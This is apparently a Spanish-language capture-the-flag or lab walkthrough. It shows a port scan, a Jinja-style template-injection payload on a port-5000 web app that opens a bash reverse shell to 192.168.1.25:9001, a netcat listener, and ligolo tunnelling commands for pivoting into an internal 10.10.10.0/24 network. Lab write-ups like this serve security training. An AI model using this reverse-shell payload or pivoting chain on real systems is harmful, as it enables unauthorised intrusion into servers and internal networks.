Escaneo de puertos
Lanzamos nmap para realizar el escaneo de puertos
En el puerto 5000 nos encontramos un aplicativo web con un panel de registro.
Vamos a utilizar un payload dpara obtener una revshell:
{% for x in [].class.base.subclasses() %} {% if x.name == ‘catch_warnings’ %} {% for y in x.init.globals.values() %} {% if y.class == {}.class %} {% if ‘eval’ in y.keys() %} {{ y‘eval’.system(‘bash -c \”bash -i >& /dev/tcp/192.168.1.25/9001 0>&1\”‘)”) }} {% endif %} {% endif %} {% endfor %} {% endif %} {% endfor %}
Nos ponemos a la escucha por el puerto 9001
nc -lvp 9001
Una vez dentro encontramos la primera flag y además vemos que hay otra interface red y nos indica que la contraseña está en ese segundo adaptador de red.
En esta parte vamos a configurar ligolo para establecer un tunel desde nuestra máquina kali hacía la red 10.10.10.0/24
Primero nos descargamos los binarios (proxy y agent) de la página de github
Una vez que tengamos los archivos descomprimidos en nuestra máquina kali procederemos a crear un nuevo interfaz de red en modo tunel. Le llamaremos ligolo1 ya que vamos a necesitar crear otros tuneles a posterior más vale tenerlo numerados para seguir un orden.
sudo ip tuntap add user $USER mode tun ligolo1
Y lo levantamos
sudo ip link set ligolo1 up
Ahora necesitamos agregar a nuestra tabla de enrutamiento el segmento de red al que necesitamos llegar que es la 10.10.10.0/24
sudo ip route add 10.10.10.0/24 dev ligolo1
Ahora nos damos permisos a nuestro archivo proxy, que hará de servidor desde nuestra máquina kali
chmod +x proxy
y ejecutamos el proxy como sudo
sudo ./proxy -selfcert
Ahora nos levantamos un servidor http en nuestra máquina kali en la carpeta en la que tengamos el archivo agent
Y nos vamos a la sesión de la máquina intermedia en la que tenemos nuestra revershell para transferir el archivo
Una vez que lo tengamos descargado nos damos permisos de ejecución
chmod +x agent
Y conectamos la máquina a nuestra máquina kali indicando la ip y el puerto que nos ha indicado ligolo
./agent -connect 192.168.1.25:11601 -ignore-cert
Ahora lo que tenemos que hacer es elegir la sesion y arrancar la aplicación para establecer el tunel.
Y comprobamos que ya tenemos ping